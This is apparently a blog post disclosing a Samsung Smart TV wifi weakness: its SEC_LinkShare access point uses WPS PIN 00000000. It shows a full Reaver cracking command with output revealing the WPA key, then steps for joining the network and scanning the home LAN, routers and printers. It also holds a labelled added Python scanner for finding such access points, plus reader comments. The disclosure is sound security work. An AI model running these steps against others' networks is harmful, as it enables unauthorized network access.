(Or wtf is SEC_Linkshare?)
Samsung Smart TVs have the ability to connect to other devices using wifi – you can turn this feature on in the Network settings on the TV.
This could, for instance, allow you to use an iPhone app as a remote control for the TV or play a slideshow from your smartphone.
But if you enable this feature you’ll suddenly find a new wireless SSID in your area called SEC_Linkshare_xxxxxx.
This is your Samsung TV operating as a Wireless Access Point and it presents a massive security risk to your network.
To connect devices to the TV it uses Wireless Protected Setup (WPS) – a quick and easy way to pair wifi devices. However, hacking WPS devices became extremely easy in December 2011 when a tool called Reaver was released by Tactical Network Solutions, enabling anyone to discover the WPA password within a few hours on most WPS enabled routers. Samsung make this problem even worse with the Smart TV because it uses a WPS pin of 00000000, which of course is one of the first ones Reaver will try, so you can discover the SEC_Linkshare_xxxxxx WPA key in less than 10 seconds!
Here’s the output from Terminal showing Reaver hacking my TV in 5 seconds flat:
john@VIAO:~$ sudo reaver -i mon3 -b E4:E0:C5:05:D5:68 -vv
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
[+] Waiting for beacon from E4:E0:C5:05:D5:68
[+] Switching mon3 to channel 1
[+] Associated with E4:E0:C5:05:D5:68 (ESSID: SEC_LinkShare_419a94)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 00005678
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 00000000
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 5 seconds
[+] WPS PIN: '00000000'
[+] WPA PSK: 'ngYWQnHzxa86JxF9QOiWxrLn0eWa31'
[+] AP SSID: 'SEC_LinkShare_419a94'
john@VIAO:~$
Once a hacker knows the wifi password (WPA PSK) to the Samsung’s AP, they will be able to join the network, see all other devices and browse the Internet.
Join the network using the discovered key.
Here you can see my MacBook using this connection.
Your device will obtain an IP address from the TV via DHCP (10.123.12.128 in this case). It’s on a different subnet to the LAN that the TV is connected to, but nevertheless it routes through to the home LAN.
Scanning the network will show other devices:
It’s not possible to re-configure the AP or disable WPS, so if you don’t want your neighbour on your broadband connection (or worse), I’d advise disabling the Samsung Wireless Link asap.
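To check whether a TV near you is exposing this access point, the following added example (not part of the original post) parses wireless scan output and lists APs using the SEC_LinkShare naming, with those advertising WPS first. The sample scan text is constructed, modelled on the layout of `iw dev <iface> scan` with indentation normalised to spaces, and the function names are illustrative.

```python
import re

# Constructed sample modelled on `iw dev <iface> scan` output. Only the first
# BSSID/SSID pair comes from the post; the other two entries are made up.
SAMPLE_SCAN = """\
BSS e4:e0:c5:05:d5:68(on wlan0)
    freq: 2412
    SSID: SEC_LinkShare_419a94
    RSN:     * Version: 1
    WPS:     * Version: 1.0
         * Wi-Fi Protected Setup State: 2 (Configured)
BSS 02:00:00:aa:bb:01(on wlan0)
    freq: 2437
    SSID: HomeLAN
BSS 02:00:00:aa:bb:02(on wlan0)
    freq: 2462
    SSID: SEC_LinkShare_000000
"""

# A new record starts at column 0; indented fields such as "BSS Load:" do not match.
BSS_RE = re.compile(r"^BSS ([0-9a-f:]{17})", re.I)

def parse_scan(text):
    """Split scan output into one dict per BSS: bssid, ssid, freq, wps."""
    aps = []
    for line in text.splitlines():
        m = BSS_RE.match(line)
        field = line.strip()
        if m:
            aps.append({"bssid": m.group(1).lower(), "ssid": "", "freq": None, "wps": False})
        elif not aps:
            continue  # ignore anything printed before the first BSS record
        elif field.startswith("SSID:"):
            aps[-1]["ssid"] = field[5:].strip()
        elif field.startswith("freq:"):
            aps[-1]["freq"] = int(float(field[5:]))  # accepts "2412" and "2412.0"
        elif field.startswith("WPS:"):
            aps[-1]["wps"] = True  # a WPS information element is advertised
    return aps

def find_tv_aps(aps, prefix="SEC_LinkShare_"):
    """Return APs whose SSID uses the TV's naming, WPS-advertising ones first."""
    hits = [ap for ap in aps if ap["ssid"].lower().startswith(prefix.lower())]
    return sorted(hits, key=lambda ap: not ap["wps"])

if __name__ == "__main__":
    for ap in find_tv_aps(parse_scan(SAMPLE_SCAN)):
        state = "WPS advertised" if ap["wps"] else "no WPS element seen"
        print(f'{ap["bssid"]}  {ap["ssid"]}  {ap["freq"]} MHz  {state}')
```

Any hit that belongs to your own TV is a prompt to turn off the Samsung Wireless Link setting, since the AP itself cannot be reconfigured.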
Here’s a demo of the iPhone connected to the Samsung TV – as you can see it gets IP address 10.123.12.128
Although the iPhone is on a different subnet to the TV’s LAN network you can still scan the LAN if you can guess the range.
Now we know what else is on the network we can scan for open ports, log into the broadband router or perhaps the printer’s webpage:
From there, some printers may even give access to previously printed jobs. As you can see this is a huge (poorly publicised*) security risk.
[The only other report I’ve found regarding this issue is here: http://www.oeioei.nl/internet/tvlek.php]
Further reading: http://steveshank.com/cgi-bin/article.pl?aid=373
Holy shit. I just saw it in the WPS spreadsheet. This is horrible.
I know it’s old, but the TVs are still out there, like the one my neighbor has.
If you make a traceroute you can see the next gateway (router IP).
I believe there was an update that made it so a WPA2 key was required: WPA won’t cut it. I’m not sure if Reaver supports cracking WPA2.